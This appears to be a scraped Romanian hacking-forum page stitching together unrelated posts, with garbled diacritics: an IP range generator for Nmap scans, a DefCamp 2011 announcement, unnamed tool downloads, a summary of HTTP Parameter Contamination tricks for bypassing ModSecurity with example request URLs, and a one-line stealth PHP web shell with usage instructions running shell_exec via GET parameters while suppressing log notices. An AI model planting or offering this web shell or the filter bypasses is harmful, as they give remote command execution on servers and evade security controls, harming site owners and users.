Leaderboard

Am facut un Generator de ip-uri aflate intre doua intervale. Rezultatul se salveaza intr-un fisier result.txt in acelasi folder in care este situat executabilul. Se poate folosi la generarea de ip-uri pentru scan cu Nmap sau la orice altceva il considerati util. Have fun! Download: http://www.mediafire.com/download/i137bggwbxa9lq3/IP_Range_Gen_(M2G).jar

În perioada 30 septembrie – 2 octombrie 2011, în Bran, jude?ul Bra?ov, se va desf??ura primul eveniment din România dedicat (in)securit??ii informatice – DefCamp 2011. Evenimentul va aduna oameni din toate col?urile ??rii ce doresc s? cunoasc?, s? vad? ce se întâmpl? cu adev?rat în acest domeniu, s? se orienteze, s? se simt? bine al?turi de alte persoane cu acelea?i interese ?i pasiuni, s? plece de aici cu noi prietenii cu care, într-un final, s? lege proiecte noi, puternice ?i care s? înceap? s? pun? punctul pe România atunci când cineva face referire la Europa de Est. Ultima perioada a fost marcata de numeroase regrupari, reorganizari atat pe RST cat si in jurul comunitatii. Asa cum am mai spus, se simte nevoia de a ne specializa, de a ne apropia mai mult, de a forma grupuri si de a dezvolta. DefCamp e prima oportunitate a noastra de a ne cunoaste fata in fata, de a consuma o bere, doua, trei si de a pune cap la cap urmatoarele proiecte. Daca sunteti printre cei care pana acum au simtit nevoia de ceva nou la noi in acest domeniu, luati aceasta varianta ca o posibila solutie la a iesi din mediul nostru familiar. RST, No Security, ISR, TBO, T-T si multi altii din aceste comunitati vor sa vina.

This is a new & good fresh Tool (Rolleyes) a friend of Jordan has made ??to another forum: p But I share here: p Well, I thought everyone know the role of this tool Download

Ivan Markovic has recently published the results of his research on the development of attack Http Parameter Pollution. A new attack called Http Parameter Contamination (HPC). The essence of this attack consists in the fact that the various platforms and applications are handled differently obviously incorrect parameters. This is illustrated in the following table: Attack of the HPC, like HPP, can be used to bypass various filters, security restrictions and regulations Site Web Application Firewall. In particular, the researcher gives the following examples of bending rules Mod_Security: Example 1 (Apache / php): Forbidden: http://localhost/?xp_cmdshell'>http://localhost/?xp_cmdshell Bypassed ([=> _): http://localhost/?xp [cmdshell Example 2 (IIS / ASP): Forbidden: http://192.168.2.105/test.asp?file=../bla.txt Bypassed (.%. => ..): Http://192.168.2.105/test.asp?file =.%./ bla.txt The full results of the survey by visiting: http://www.exploit-db.com/download_pdf/17534

Have you ever needed a small shell written in PHP? Of course you have. But I bet it haven't been all too stealth! This is really pointless, but someone might be interested in it. So here you go folks! <?=($_=@$_GET[2]).@$_($_GET[1])?> it doesn't look like much so let me explain. PHP allows strings to be interpreted as function calls. That's a major part on how callbacks in PHP work. Example: <? $array = array(1,2,3); array_walk($array, 'f'); function f($x){echo $x * 2;} ?> What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list. The function f() prints out the value from the array and multiplies it by two. The output results in: 246. The fun thing is, if you look on how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function; array_walk()). What does that mean? Well, to put it short, you're able to take a string - and execute it as a function name. Now, let's try something... fuzzier... <? $fuzz = 'phpinfo'; $fuzz(); ?> What might this do? Will it execute? Damn right. Now let's tear my tiny code apart. It's made out of two parts. $_=@$_GET[2] @$_($_GET[1]) The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_. The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it's one-and-only argument. The @'s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them. Conclusion: Copy and paste the snippet, and store it in a PHP-file. Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami The response should be something like: apache ...or as on Windows if you're running your server as a service: nt authority/system. Conclusion; PHP is fun!

Update: DataKiller v0.2 Ce e nou: - Safe file delete Vedeti primul post pentru mai multe informatii.

iar tu fa proasto?